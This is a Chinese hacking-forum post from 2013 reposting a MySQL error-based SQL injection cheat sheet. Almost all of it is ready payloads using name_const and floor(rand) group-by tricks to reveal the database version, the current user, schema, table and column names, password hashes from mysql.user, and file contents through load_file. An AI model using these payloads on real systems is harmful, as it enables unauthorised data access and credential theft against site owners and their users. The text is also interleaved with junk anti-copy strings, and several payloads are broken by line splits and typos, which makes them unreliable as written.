Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

( \+ d% }9 l. C! j) |( a/ e. d
9 z4 D" i) F) R- BMysql暴错注入参考（pdf），每天一贴。。。
# Y- S0 u* q8 x' N8 c
8 L% k. D- p) A9 S9 @! O2 y1 GMySql Error Based Injection Reference
[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
4 J. }, a9 m( w) J$ M查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
/ ~- B& f2 {) L5 s7 g. E/ \join+(select+name_const(@@version,0))b)c)
; q% v$ B$ X# F, TMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
6 C1 W8 b+ m/ |% p: q, Y6 ?/ ~查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
  ?* i9 F, o! l5 w" s( K6 K查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
# a6 x9 F2 z: Q4 X  dLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
7 S6 x% B% v% f爆指定库数目:
8 ~: v" t6 I3 e" b0 Uand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
$ ^  B9 b! f# j' `' `6 t% Yable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
  w; X) F+ S0 @. `+by+x)a)+and+1=1 0x6D7973716C=mysql
0 W: V( a" r0 k! s: m依次爆表:
! K$ g  F5 _6 S' S4 yand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
1 v1 q% C5 E: ]9 q% d7 J8 Kbles+group+by+x)a)+and+1=1
2 p/ d+ N# [' ^0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
) v0 O  W2 V7 p9 M, Cand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
: k" ^; ^; s" e- l依次爆字段:
* O) P* v; ]& Z+ M1 ^and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
' |& `! T8 V3 l2 o7 i9 h& wloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
0 h  V( k7 C' w  S% b) x1 w$ y: G依次暴内容:
8 R" n! d2 s! t% ]) g: H: S6 Eand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
6 [  z2 i/ r) q$ s' B1 {ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
( M& h  l8 a# v) z& j0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

( @2 R9 y6 t* B2 ~( s; g- W不要下载也可以，